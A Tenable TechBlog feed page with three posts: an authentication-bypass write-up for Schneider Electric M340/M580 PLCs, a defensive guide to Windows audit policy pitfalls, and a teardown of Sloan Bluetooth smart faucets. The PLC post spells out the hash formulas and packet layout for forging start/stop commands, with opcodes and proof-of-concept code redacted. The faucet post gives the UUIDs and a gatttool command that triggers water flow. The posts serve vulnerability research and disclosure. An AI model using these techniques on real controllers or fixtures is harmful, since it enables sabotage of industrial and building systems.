Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

Examining Crypto and Bypassing Authentication in Schneider Electric PLCs (M340/M580)

13 July 2021 at 14:31

What you see in the picture above is similar to what you might see at a factory, plant, or inside a machine. At the core of it is Schneider Electric’s Modicon M340 programmable logic controller (PLC). It’s the module at the top right with the ethernet cable plugged in (see picture below), the brains of the operation.

Power supply, PLC, and IO modules attached to backplane.

PLCs are devices that coordinate, monitor, and control industrial processes or machines. They interface with modules (often interconnected through a shared backplane) that allow them to gather data from sensors such as thermostats, pressure, proximity, etc.., and send control signals to equipment such as motors, pumps, and heaters. They are typically hardened in order to survive in rough environments.

PLCs are typically connected to a Supervisory Control and Data Acquisition (SCADA) system or Human Machine Interface (HMI), the user interface for control systems. SCADA controllers can monitor and control multiple subordinate PLCs from one location, and like PLCs, are also monitored and controlled by humans through a connected HMI.

In our test system, we have a Schneider Electric Modicon M340 PLC. It is able to switch on and off outlets via solid state relays and is connected to my network via an ethernet cable, and the engineering station software on my computer is running an HMI which allows me to turn the outlets on and off. Here is the simple HMI I designed for switching the outlets:

Simple Human Machine Interface (HMI)

The connected light is currently on (the yellow circle). Hitting the off button will turn off the actual light and turn the circle on the interface gray.

The engineering station contains programming software (Schneider Electric Control Expert) that allows one to program both the PLC and HMI interfaces.

A PLC is very similar to a virtual machine in its operation; they typically run an underlying operating system or “firmware,” and the control program or “runtime” is started, stopped, and monitored by the underlying operating system.

Ecostruxure Control Expert — Engineering Station Software

These systems often operate in “air-gapped” environments (not connected to the internet) for security purposes, but this is not always the case. Additionally, it is possible for malware (e.g. stuxnet) to make it into the environments when engineers or technicians plug outside equipment into the network, such as laptops for maintenance.

Cyber security in industrial control systems has been severely lacking for decades, mostly due to the false sense of security given by “air-gaps” or segmented networks. Often controllers are not protected by any sort of security at all. Some vendors claim that it is the responsibility of an intermediary system to enforce.

As a result of this somewhat lax standpoint towards security in industrial automation, there have been a few attacks recently that made the news:

Vendors are finally starting to wake up to this, and newer PLCs and software revisions are starting to implement more hardened security all the way down to the controller level. In this blog, I will examine the recent cyber security enhancements inside Schneider Electric’s Modicon M340 PLC.

Internet Connected Devices

The team did a cursory search on BinaryEdge to determine if any of these devices (including the M580, which we later learned was also affected) are connected to the internet. To our surprise, we found quite a few that appear legitimate across several industries including:

  • Water Treatment
  • Oil (production)
  • Gas
  • Solar
  • Hydro
  • Drainage / Levees
  • Dairy
  • Car Washes
  • Cosmetics
  • Fertilizer
  • Parking
  • Plastic Manufacturing
  • Air Filtration

Here is a breakdown of the top 10 affected countries at the time of this writing:

We have alerted ICS-CERT of the presence of these devices prior to disclosure in order to hopefully mitigate any possible attacks.

PLC Engineering Station Connection

The engineering station talks to the PLC primarily via two protocols, FTP, and Modbus. FTP is primarily used to upgrade the firmware on the device. Modbus is used to upload the runtime code to the controller, start/stop the controller runtime, and allow for remote monitoring and control via an HMI.

Modbus can be utilized over various transport layers such as ethernet or serial. In this blog, we will focus on Modbus over TCP/IP.

Modbus is a very simple protocol designed by Schneider Electric for communicating with multiple controllers for the purposes of monitoring and control. Here is the Modbus TCP/IP packet structure:

Modbus packet structure (from Wikipedia)

There are several predefined function codes in modbus, like read/write coils (e.g. for operating relays attached to a PLC) or read/write registers (e.g. to read sensor data). For our controller (and many others), Schneider Electric has a custom function code called Unified Messaging Application Services or UMAS. This function code is 0x5a, or 90. The data bytes contain the underlying UMAS packet data. So in essence, UMAS is tunneled through Modbus.

After the 0x5a there are two bytes, the second of which is the UMAS packet type. In the image above, it is 0x02, which is a READ_ID request. You can find out more information about the UMAS protocol, and a break down of the various message types in this great writeup: http://lirasenlared.blogspot.com/2017/08/the-unity-umas-protocol-part-i.html.

M340 Cyber Security

The recent cyber security enhancements in the M340 firmware (from version 3.01 on 2/2019 and onward) are designed to prevent a remote attacker from executing certain functions on the controller, such as starting and stopping the runtime, reading and writing variables or system bits (to control the program execution), or even uploading a new project to the controller if an application password is configured under the “Project & Controller Protection” tab in the project properties. Due to it being improperly implemented, it is possible to start and stop the controller without this password, as well as perform other control functions protected by the cyber security feature.

Auth Bypass

When connecting to a PLC, the client sends a request to read memory block <redacted> on the PLC before any authentication is performed. This block appears to contain information about the project (such as the project name, version, and file path to the project on the engineering station) and authentication information as well.

<redacted> memory block, containing authentication hashes

Here, “TenableFactory” is the project name. “AGC7MAIWE” is the “Crypted” program and safety project password. The base64 string is used afterwards to verify the application password. This is done as follows:

The actual password is only checked on the client side. To negotiate an authenticated session, or “reservation” first you need to generate a 32 byte random nonce (which is a term for a random number generated once each session), send it to the server, and get one back. This is done through a new type of UMAS packet introduced with the cyber security upgrades, which is <redacted>. I’ve highlighted the nonces (client followed by server) exchanged below:

The next step is to make a reservation using packet type <redacted>. With the new cyber security enhancements, in addition to the computer name of the connecting host, an ASCII sha256 hash is also appended:

This hash is generated as follows:

SHA256 (server_nonce + base64_str + client_nonce)

The base64 string is from the first block <redacted> read and in this case would be:

“pMESWEjNgAY=\r\nf6A17wsxm7F5syxa75GsQhNVC4bDw1qrEhnAp08RqsM=\r\n”. 

You do not need to know the actual password to generate this SHA256.

The response contains a byte at the end (here it is 0xc9) that needs to be included after the 0x5a in protected requests (such as starting and stopping the PLC runtime).

To generate a request to a protected function (such as start PLC runtime) you first start with the base request:

# start PLC request
to_send = “\x5a” + check_byte + “\x40\xff\x00”

check_byte in this case would be 0xc9 from the reservation request response. You then calculate two hashes:

auth_hash_pre = sha256(hardware_id + client_nonce).digest()
auth_hash_post = sha256(hardware_id + server_nonce).digest()

hardware_id can be obtained by issuing an info request (0x02):

Here the hardware_id is 06 01 03 01.

Once you have the hashes above, you calculate the “auth” hash as follows:

auth_hash = (sha256(auth_hash_pre + to_send + auth_hash_post).digest())

The complete packet (without modbus header) is built as follows:

start_plc_pkt = (“\x5a” + check_byte + “\x38\01” + auth_hash + to_send)

Put everything together in a PoC and you can do things like start and stop controllers remotely:

Proof of Concept in action

A complete PoC (auth_bypass_poc.py) can be found here:

<redacted>

Here is a demo video of the exploit in action, against a model water treatment plant:

Ideally, the controller itself should verify the password. Using a temporal key-exchange algorithm such as Diffie-Hellman to negotiate a pre-shared key, the password could be encrypted using a cipher such as AES and securely shared with the controller for evaluation. Better yet, certificate authentication could be implemented which would allow access to be easily revoked from one central location.

Program and Safety Password

If the Crypted box is checked, a weak, unknown, non-cryptographically sound custom algorithm is used, which reveals the length of the password (the length of hash = length of password).

Program and Safety Protection Password Crypted Option

If the “Crypt” box isn’t checked, this password is in plaintext which is a password disclosure issue.

Here is a reverse engineered implementation I wrote in python:

This appears to be a custom hashing function, as I couldn’t find anything similar to it during my research. There are a couple of issues I’ve noticed. First, the length of the hash matches the length of the password, revealing the password length. Secondly, the hash itself is limited in characters (A-Z and 0–9) which is likely to lead to hash collisions. It is easily possible to find two plaintext messages that hash to the same value, especially with smaller passwords. For example, ‘acq’, ‘asq’, ‘isy’ and ‘qsq’ all hash to ‘5DF’.

Firmware Web Server Errata

Here are a few things I noticed while examining the controller firmware, specifically having to do with the built-in PLC web server they call FactoryCase. This is not enabled by default.

Predictable Web Nonce

The web nonce is calculated by concatenating a few time stamps to a hard coded string. Therefore, it would be possible to predict what values the nonce might be within a certain time frame.

The proper way to calculate a nonce would be to use a proper cryptographic random number generator.

Rot13 Storage of Web Password Data

It appears that the plaintext web username and password is stored somewhere locally on the controller using rot13. Ideally, these should be stored using a salted hash. If the controller was stolen, it might be possible for an attacker to recover this password.

Conclusion

What at the surface looks like authentication, especially when viewing a packet capture, actually isn’t when you dig into the details. Some critical errors were made and not caught during the design and testing of the authentication mechanisms. More oversight and auditing is needed for the security mechanisms in critical products such as this. It’s as critical as the water proofing, heat shielding, and vibration hardening in the hardware. These enhancements should not have made it past critical design review.

This goes back to a core tenet of security that you can’t trust a client. You have to verify every interaction server side. You can not rely on client side software (a.k.a “Engineering Station”) to do the security checks. This verification needs to be done at every level, all the way down to the PLCs.

Another tenet violated would be to not roll your own crypto. There are tons of standard cryptographic algorithms implemented in well tested and designed libraries, and published authentication standards that are easy enough to borrow. You will make a mistake trying to implement it yourself.

We disclosed the vulnerability to Schneider Electric in May 2021. As per https://www.zdnet.com/article/modipwn-critical-vulnerability-discovered-in-schneider-electric-modicon-plcs/, the vulnerability was first reported to Schneider in Fall 2020. In the interest of keeping sensitive systems “safer”, we have had to redact multiple opcodes and PoC code from the blog as this is one of those rarest of rare cases where full disclosure couldn’t be followed. After many animated internal discussions, we had to take this step even though we are proponents of full disclosure. Schneider hasn’t provided an ETA yet on when this issue would be fixed, saying that it is still many months out. We were also informed that five other researchers have co-discovered and reported this issue.

While vendors are expected to patch within 90 days of disclosure, the ICS industry as a whole hasn’t evolved to the extent it should have in terms of security maturity to meet these expectations. Given the sensitive industries where the PLCs are deployed, one would imagine that we would have come a long way by now in terms of elevating the security posture. Prioritizing and funding a holistic Security Development Lifecycle (SDL) is key to reducing cyber exposure and raising the bar for attackers.. However, many of these systems are just sitting there unguarded and in some cases, without anyone aware of the potential danger.

See https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2021-194-01 for Schneider Electrics advisory.

See https://us-cert.cisa.gov/ics/advisories/icsa-21-194-02 for ICS-CERTs advisory.


Examining Crypto and Bypassing Authentication in Schneider Electric PLCs (M340/M580) was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Don’t make your SOC blind to Active Directory attacks: 5 surprising behaviors of Windows audit…

6 July 2021 at 21:54

Don’t make your SOC blind to Active Directory attacks: 5 surprising behaviors of Windows audit policy

Tenable.ad can detect Active Directory attacks. To do this, the solution needs to collect security events from the monitored Domain Controllers to be analyzed and correlated. Fortunately, Windows offers built-in audit policy settings to configure which events should be logged. But when testing those options, we noticed surprising behaviors that can lead to missed events.

When you configure your Active Directory domain controllers to log security events to send to your SIEM and raise alerts, you absolutely do not want any regression which would ultimately blind your SOC! In this article we will share technical tips to prevent those unexpected issues.

Disclaimer

This content is based on observations and our interpretation of Microsoft documentation. This article is provided “as-is” and we do not provide any guarantee of correctness nor exhaustiveness and you should only rely on Microsoft guidance.

Introduction

Starting with Windows 2000, Windows offered only simple audit policy settings grouped in nine categories. Those are referred to as “top-level categories” or “basic audit policy” and they are still available in modern versions.

Later, “granular auditing” was introduced with Windows Vista / 2008 (it was configurable only via “auditpol.exe”) and then Windows 7 / 2008 R2 (configurable via GPO). Those are referred to as “sub-level categories” or “advanced audit policy”.

Each basic setting corresponds to a mix of several advanced settings. For example, from Microsoft Advanced security auditing FAQ:

Enabling the single basic account logon setting would be the equivalent of setting all four advanced account logon settings.

The content described in this article was tested on Windows Active Directory domain controllers because those are the most appropriate sources of interest for Active Directory attacks detection, but it should apply to all kinds of Windows machines (servers & workstations).

Surprise #1 — Advanced audit policy fully replaces the basic policy

As soon as we enable even just one advanced audit policy setting, Windows fully switches to advanced policy mode and ignores all existing basic policies (at least on the recent versions of Windows we tested)! Here is a demonstration:

  • Before: the system uses basic settings. We enable “Success, Failure” for “Audit privilege use” (green highlighting) and for other categories the default values apply. This works as expected:
  • After: we only enable one advanced setting (green highlighting). Notice how everything else is not audited anymore, including what we explicitly configured in the basic policy (red highlighting)!

Therefore, you cannot have both and thus when you start using the advanced audit policy, which you should, you are committed to it and should abandon the basic settings to prevent confusion.

Microsoft Advanced security auditing FAQ explains it:

When advanced audit policy settings are applied by using Group Policy, the current computer’s audit policy settings are cleared before the resulting advanced audit policy settings are applied. After you apply advanced audit policy settings by using Group Policy, you can only reliably set system audit policy for the computer by using the advanced audit policy settings. […] Important: Whether you apply advanced audit policies by using Group Policy or by using logon scripts, do not use both the basic audit policy settings under Local Policies\Audit Policy and the advanced settings under Security Settings\Advanced Audit Policy Configuration. Using both advanced and basic audit policy settings can cause unexpected results in audit reporting.

➡️ Tenable.ad recommendation: use advanced audit policy settings only. Existing basic audit policies should be converted.
This recommendation is present in the best practices and hardening guides published by cybersecurity organizations (such as ANSSI, DISA STIG, CIS Benchmarks…).

Surprise #2 — Advanced audit policy may be ignored

However, there are some cases where basic audit policy settings may still take priority over the ones defined in the advanced audit policy. Correctly understanding when and where it could happen is complicated.

As per Microsoft Advanced security auditing FAQ:

If you use Advanced Audit Policy Configuration settings or use logon scripts to apply advanced audit policies, be sure to enable the “Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings” policy setting under “Local Policies\Security Options”. This will prevent conflicts between similar settings by forcing basic security auditing to be ignored.

➡️ Tenable.ad recommendation: once you start using advanced audit policy, we recommend enabling the “Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings” GPO setting to prevent undesired surprises. Its default value being “Enabled”, it should already be effective anyway in the majority of environments.
This recommendation is present in the best practices and hardening guides published by cybersecurity organizations (such as ANSSI, DISA STIG, CIS Benchmarks…).

Surprise #3 — Advanced audit policy default values are not respected

As we saw previously, as soon as we enable even just one advanced audit policy setting the system entirely switches to the advanced mode. The question we may have now is how does the system manage the other settings that we did not specify? There are certainly sensible default values, aren’t there? These default values are described in the documentation of each audit policy setting. Let’s read the explanation of the “Audit Logon” setting:

So, here on a server I should expect a default value of “Success, Failure” for the “Audit Logon” setting if not configured, shouldn’t I? Well, we may have a surprise here.

Here is the configuration I applied on my server: I enabled “Success” logging for “Audit Account Lockout” and left “Audit Logon” as “Not Configured”:

However, when looking at the resulting audit policy I notice that “Logon” events are not audited, contrary to their default:

We knew we should not rely on defaults… but this one is really surprising. Of course we made sure that there was no other GPO defining any audit policy setting.

➡️ Tenable.ad recommendation: do not rely on default values for Advanced audit policy settings: explicitly configure the desired value (No Auditing, Success, Failure, or Success and Failure) for each setting of interest.

Be even more careful when migrating from a basic audit policy: make sure to export the resulting policy you had on a normal machine, and convert it to all the appropriate advanced settings to prevent any regression in logging. And as usual with GPOs, especially for security settings, aim to create a single security GPO linked the highest possible, instead of spreading those in many lower-level GPOs.

Surprise #4 — Settings defined by GPOs are not merged

What happens when a machine is covered by several GPOs which define audit policy settings? What if one GPO enables “Success” auditing while another enables “Failure” auditing, is there a merge and would we obtain “Success and Failure”?

Answer: there is no merge at the setting level, and only the value of the GPO with the highest priority is applied. This is actually coherent with the way the Group Policy engine usually works, so not really a surprise, but still to keep in mind.

Here is a demonstration where we want to configure auditing on domain controllers. Two GPOs apply to those servers:

Default Domain Policy” linked at the top of the Active Directory domain

  • Audit Account Lockout” is set to “Success and Failure” (yellow highlighting)
  • Audit Logon” is set to “Success” (red highlighting)

Default Domain Controllers Policy” linked to the “Domain Controllers” organization unit

  • Audit Logoff” is set to “Success and Failure” (blue highlighting)
  • Audit Logon” is set to “Failure” (red highlighting)

Now let’s see the resulting audit policy:

We notice that the conflicting values for “Logon” (red highlighting) were not merged, instead it is the value of the “Default Domain Controllers Policy”. This GPO won as per the usual GPO precedence rules.

We also observe that the values for “Logoff” (blue highlighting) from the “Default Domain Controllers Policy” and “Account Lockout” (yellow highlighting) from the “Default Domain Policy” are both properly applied because those were not in conflict.

Here is how Microsoft Advanced security auditing FAQ explains it:

By default, policy options that are set in GPOs and linked to higher levels of Active Directory sites, domains, and OUs are inherited by all OUs at lower levels. However, an inherited policy can be overridden by a GPO that is linked at a lower level.

You can also read more about GPO Processing Order in the [MS-GPOL] specification.

➡️ Tenable.ad recommendation: keep in mind that conflicting audit settings are not merged.
If you want to define a domain-wide security auditing GPO, you should ensure that no other GPO at a lower OU level overrides its settings. If necessary, you can set this domain-wide GPO as “Enforced”, even if this is not our preferred option as it can become confusing when managing a large set of GPOs.

If you are only concerned about auditing on domain controllers, you can link a GPO to the “Domain Controllers” organizational unit, as long as there is no domain-level “Enforced” GPO overriding audit policy settings.

Surprise #5 — Only one tool properly shows the effective audit policy

We have just shown that we can have many surprises when configuring auditing, so we really would like a way to see the effective audit policy on a system to confirm that it is as expected.

We could be tempted to use tools which compute the result of GPOs (RSoP), but…

For example, “rsop.msc” does not even seem to support advanced audit policy, which is not too surprising since it is deprecated! See how this section is used in the GPO editor on the right-hand side whereas it is missing in “rsop.msc” on the left-hand side:

And with “gpresult.exe”, if we have basic and advanced audit policies, we will see both: which one applies?

And what about settings that might have been configured locally and not through a GPO (which is not advised…)?

The only supported tool which can properly read the current effective audit policy is “auditpol.exe”, as you may have guessed from our previous screenshots. This is confirmed by a Microsoft blog post. For those who want to dig deeper: “auditpol.exe” calls AuditQuerySystemPolicywhich finally calls the “LsarQueryAuditPolicy” RPC in LSASS.

➡️ Tenable.ad recommendation: only trust the following command to see the effective audit policy on machines: “auditpol.exe /get /category:*”

Surprise bonus — Confusions in the specification

Configuring advanced audit policy in a GPO creates an “audit.csv” file which is described in the [MS-GPAC] Microsoft open specification. We found a mistake in one of the examples:

Machine Name,Policy Target,Subcategory,Subcategory GUID,Inclusion Setting,Exclusion Setting,Setting Value
TEST-MACHINE,System,IPsec Driver,{0CCE9213–69AE-11D9-BED3–505054503030},No Auditing,,0
TEST-MACHINE,System,System Integrity,{0CCE9212–69AE-11D9-BED3–505054503030},Success,,1
TEST-MACHINE,System,IPsec Extended Mode,{0CCE921A-69AE-11D9-BED3–505054503030},Success and Failure,,3
TEST-MACHINE,System,File System,{0CCE921D-69AE-11D9-BED3–505054503030},Not specified,,0

On the right-hand columns we have the setting name (such as “No Auditing”, “Success”, etc.) and the corresponding numerical value (0, 1, 3…). We can see that according to the first and last lines the value “0” is associated with both “No Auditing” and “Not specified” which does not make sense. Fortunately the text value is ignored: “value of InclusionSetting is for user readability only and is ignored when the advanced audit policy is applied”.

Also, we found the specification a bit confusing regarding the values of “0” and “4”:

A value of “0”: Indicates that this audit subcategory setting is unchanged.
A value of “4”: Indicates that this audit subcategory setting is set to None.

Our observations actually show that:

  • A value of “0” means that auditing is “disabled”, which corresponds to this in the graphical editor:
  • A value of “4” means that auditing is “not specified”, and thus the default value should apply (except when it does not, as shown before), which would correspond to this in the graphical editor (except that in this case the editor does not even generate a line for this setting in “audit.csv”):

Don’t make your SOC blind to Active Directory attacks: 5 surprising behaviors of Windows audit… was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Plumbing the Depths of Sloan’s Smart Bathroom Fixture Vulnerabilities

By: Ben Smith
30 June 2021 at 13:03

As I stood in line at my local donut shop, I idly began scanning nearby Bluetooth Low Energy (BLE) devices. There were several high-rises nearby, and who knows what interesting things lurk in those halls. Typically, I’ll see consumer technology like Apple products, fitness trackers, entertainment systems, but that day I saw something that piqued my interest… Device Name: FAUCET ADSKU01 A0174. A bluetooth… faucet?! I had to know more. Since I clearly did not own this particular device and also didn’t want to risk a flood, I went home and looked up all I could find about these SmartFaucets while greedily gobbling a glazed donut or two.

Device Name: FAUCET

The device ran in a line of SmartFaucets and Flushometers made by Sloan Valve Company. I had to find one I could use for testing. Their connected devices are Sloan SmartFaucets including Optima EAF, Optima ETF/EBF, BASYS EFX (these require an external adapter) and Flushometers such as SOLIS and can be viewed over at https://www.sloan.com/design/connected-products. The app to connect to these devices is called SmartConnect and is available in the Google Play or Apple App stores.

An update to Sloan’s feature checklist

A Quick Bluetooth Glossary

Bluetooth Classic — This is the original Bluetooth protocol still widely used. Sometimes it will be referred to as “BR” or “EDR.” Devices are connected one to one.

Bluetooth Low Energy (BLE) — This is actually a different protocol from Bluetooth Classic. It has lower energy requirements, and devices can interoperate one-to-one, one-to-many, or even many-to-many. Almost everywhere we mention Bluetooth in this article, we mean BLE, and not Bluetooth Classic.

Services — Technically part of the “GATT” BLE layer, services are groupings of characteristics by function.

Characteristics — Part of the “GATT” BLE layer, characteristics are UUID/value pairs on a device. The value can be read, written to, and more, depending on permissions. Sometimes it’s helpful to think of them as UDP ports with (generally) very simple services.

UUIDs — Random numbers used to refer to services and characteristics. Some are assigned by the Bluetooth SIG, while others are set by the device’s manufacturer.

Sloan SmartConnect App

SmartConnect App has a button to “Dispense Water”

As its sole protection mechanism, the app requires a phone number prior to use and then sends a code to that number.

More SmartConnect app functionality

After that, quite an array of features are available. Let’s see what we can find out with an actual device.

SmartFaucet

Sloan EBF615–4 Internals

I managed to acquire a Sloan EBF615–4 Optima Plus, added batteries, and plugged in the faucet. When I wave my hand in front of the IR sensor, I can hear the clicking of the faucet mechanism allowing a potential flow of water to course through the spigot. This is good as I’ll have some way of knowing if we’re getting somewhere. I’d already installed the SloanConnect app, and registered with an actual phone number, so I was able to connect to the device.

Let’s start by using hcitool to scan for BLE devices nearby. Hcitool is a Linux utility for scanning for Bluetooth devices and interacting with our Bluetooth adapter. The ‘lescan’ option allows us to scan for Bluetooth Low Energy. The device we’re interested in is aptly named “FAUCET”.

pi@rpi4:~ $ sudo hcitool lescan | grep FAUCET
08:6B:D7:20:00:01 FAUCET ADSKU02 A0121
08:6B:D7:20:00:01 FAUCET ADSKU02 A0121

Now that we know its MAC address, we can use gatttool, a Linux utility for interacting with BLE devices, to query the BLE services:

pi@rpi4:~ $ sudo gatttool -b 08:6B:D7:20:00:01 — primary
attr handle = 0x0001, end grp handle = 0x0005 uuid: 00001800–0000–1000–8000–00805f9b34fb
attr handle = 0x0006, end grp handle = 0x0009 uuid: 00001801–0000–1000–8000–00805f9b34fb
attr handle = 0x000a, end grp handle = 0x000e uuid: 0000180a-0000–1000–8000–00805f9b34fb
attr handle = 0x000f, end grp handle = 0x002d uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c900
attr handle = 0x002e, end grp handle = 0x0031 uuid: 0000180f-0000–1000–8000–00805f9b34fb
attr handle = 0x0032, end grp handle = 0x0050 uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c910
attr handle = 0x0051, end grp handle = 0x0081 uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c920
attr handle = 0x0082, end grp handle = 0x009d uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c940
attr handle = 0x009e, end grp handle = 0x00a1 uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c950
attr handle = 0x00a2, end grp handle = 0x00ba uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c960
attr handle = 0x00bb, end grp handle = 0x00d9 uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c970
attr handle = 0x00da, end grp handle = 0xffff uuid: 1d14d6ee-fd63–4fa1-bfa4–8f47b42119f0

and their characteristics:

pi@rpi4:~ $ sudo gatttool -b 08:6B:D7:20:00:01 — characteristics
handle = 0x0002, char properties = 0x0a, char value handle = 0x0003, uuid = 00002a00–0000–1000–8000–00805f9b34fb
handle = 0x0004, char properties = 0x02, char value handle = 0x0005, uuid = 00002a01–0000–1000–8000–00805f9b34fb
handle = 0x00db, char properties = 0x08, char value handle = 0x00dc, uuid = f7bf3564-fb6d-4e53–88a4–5e37e0326063
handle = 0x00de, char properties = 0x04, char value handle = 0x00df, uuid = 984227f3–34fc-4045-a5d0–2c581f81a153

Once we reverse the Android app, we can hopefully find variable names that reference these UUIDs and determine their function.

One thing I’ve noticed while doing this is that the device seems to stop beaconing every so often, and I need to either press a button on it OR wait a bit OR unseat and reseat the batteries. It’s possible that it limits connections over a period of time.

Let’s take a look back at the app.

SmartConnect Again

After pulling the app off of my phone using adb and then reversing it with jadx, I start searching for interesting bits. The first one to jump out was:

public final void dispenseWater() {
    if (getMainViewModel().getConnectionState().getValue() == ConnectionState.CONNECTED) {
getMainViewModel() .getConnectionState() .setValue (ConnectionState.DISPENSING_WATER);
        BluetoothGattCharacteristic bluetoothGattCharacteristic = getMainViewModel().getGattCharacteristics().get(UUID.fromString(GattAttributesKt.UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE));
        if (bluetoothGattCharacteristic != null) {
bluetoothGattCharacteristic.setValue(""1"");
        }
        FragmentActivity activity = getActivity();
        if (activity != null) {
            BluetoothLeService bluetoothLeService = ((MainActivity) activity).getBluetoothLeService();
            if (bluetoothLeService != null) {
bluetoothLeService. writeCharacteristic(bluetoothGattCharacteristic);
                return;
            }
            return;
        }
        throw new TypeCastException(""null cannot be cast to non-null type com.smartwave.sloanconnect.MainActivity"");
    }
}

Seems like it’ll be pretty easy to make this thing flow. Now we just need to figure out the BLE characteristic UUID referenced by UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE. This is made incredibly easy thanks to a nice table of UUID variables.

public static final String UUID_CHARACTERISTIC_APP_IDENTIFICATION_PASS_CODE = “d0aba888-fb10–4dc9–9b17-bdd8f490c954”;
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92a”;
public static final String
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_FLUSH_ON_OFF = “d0aba888-fb10–4dc9–9b17-bdd8f490c946”;
public static final String
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c942”;
public static final String
UUID_CHARACTERISTIC_FAUCET_BD_STATISTICS_INFO_NUMBER_OF_ALL_FLUSHES = “d0aba888-fb10–4dc9–9b17-bdd8f490c916”;
public static final String
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FLUSH_VOLUME_CHANGE = “f89f13e7–83f8–4b7c-9e8b-364576d88334”;
public static final String
UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE = “f89f13e7–83f8–4b7c-9e8b-364576d88361”;

Wow. In addition to finding our water dispensing UUID, there are a lot of other interesting variable names. A select few of ~100 are shown above. It looks like this thing supports over-the-air (OTA) firmware updates, tons of diagnostic and sensor settings, possible security settings, and more.

Now that we know the UUID that turns on the water, let’s use NRF Connect to see what we can do. I’m switching over to NRF Connect from gatttool because it handles the connection easily. Since the faucet seems to ‘time out’ or disallow connections after a period of time, this is useful so we don’t lose our connection and reset everything.

The faucet’s BLE advertising information
nRF Connect for Desktop showing the faucet’s Services

In the decompiled ‘dispenseWater()’ function above, we saw that the function basically sends a ‘1’ to the UUID stored in the variable UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE. Luckily we can find the UUID in the table we found:

public static final String UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE = “d0aba888-fb10–4dc9–9b17-bdd8f490c965”;

Cool. Let’s write to that UUID. The default value is 30, so, ‘0’ in ASCII. Let’s write 31, or ‘1’, since that’s what the code does. I tried writing other numbers first but nothing else did anything, until…

nRF Connect view showing flow being enabled.

I barely refrained from yelping for joy when I heard the faucet’s telltale ‘click’ indicating the spigot had activated. Since the faucet isn’t hooked up to a water source (hey, i’m not a plumber), you’ll have to bear with the above anti-climactic demo.

We should be able to do this with gatttool via:

$ sudo gatttool -b 08:6B:D7:20:00:01 — char-write-req -a 0x00b3 -n 31

Flush Toilet

Although I don’t have a smart Flushometer, it works very similarly to the faucet. We can see the code for “flushToilet()” is almost identical:

public static final void flushToilet(BluetoothLeService bluetoothLeService, MainViewModel mainViewModel) {
    Intrinsics.checkParameterIsNotNull(bluetoothLeService, "$this$flushToilet");
    Intrinsics.checkParameterIsNotNull(mainViewModel, "mainViewModel");
    if (mainViewModel.getConnectionState().getValue() != ConnectionState.FLUSHING_TOILET) {
        mainViewModel .getConnectionState() .setValue(ConnectionState.FLUSHING_TOILET);
        BluetoothGattCharacteristic bluetoothGattCharacteristic = mainViewModel.getGattCharacteristics().get(UUID.fromString(GattAttributesKt.UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE));
        if (bluetoothGattCharacteristic != null) {
            bluetoothGattCharacteristic.setValue("1");
        }
        bluetoothLeService .writeCharacteristic(bluetoothGattCharacteristic);
    }
}

And we can look up the UUID for the flush variable:

public static final String UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE = “f89f13e7–83f8–4b7c-9e8b-364576d88361”;

Even though I don’t intend to acquire a smart Flushometer, I can confidently say I know what’s happening here.

Unlock Key

There seems to be a concept of an unlock key in the android app.

public final void setGattCharacteristics(List<? extends BluetoothGattService> list) {
    DeviceData value;
    if (list != null) {
        for (T t : list) {
            Timber.i(“Service: “ + t.getUuid(), new Object[0]);
            List<BluetoothGattCharacteristic> characteristics = t.getCharacteristics();
            Intrinsics .checkExpressionValueIsNotNull(characteristics, “service.characteristics”);
            for (T t2 : characteristics) {
                Map<UUID, BluetoothGattCharacteristic> map = this.gattCharacteristics;
                Intrinsics.checkExpressionValueIsNotNull(t2, “characteristic”);
                UUID uuid = t2.getUuid();
                Intrinsics.checkExpressionValueIsNotNull(uuid, “characteristic.uuid”);
                map.put(uuid, t2);
                if (Intrinsics.areEqual(t2.getUuid(), UUID.fromString(GattAttributesKt.UUID_CHARACTERISTIC_APP_IDENTIFICATION_UNLOCK_KEY)) && (value = this.activeDeviceData.getValue()) != null) {
                    value.setHasSecurity(true);
                }
            }
        }
    }
}

The setGattCharacteristics function is called on connection to build the list of services and characteristics. Here, if there’s an unlock key set, the app marks a ‘security’ value as true. Later on this value is checked when a few functions are called, but so far it looks like it just appends some notes if it is set. In a few scenarios, a beginSecurityProtocol() function is called, and it will read a ‘note’ from the device if security is enabled. This ‘note’ can be used to store the phone number of the last person to change the setting. The security function seems to be more of a way to keep some data about what happened than any sort of actual security.

Flow Rate

The app has two different sets of code to protect flow rate from being set too high, depending on if we’re using Liters or Gallons.

if (doubleOrNull != null) {
    d = doubleOrNull.doubleValue();
}
if ((valueOf.length() == 0) || d < 1.3d) {
    d = 1.3d;
} else if (d > 9.9d) {
    d = 9.9d;
}
#OR:
if ((valueOf.length() == 0) || d < 0.3d) {
    d = 0.3d;
} else if (d > 2.6d) {
    d = 2.6d;
}

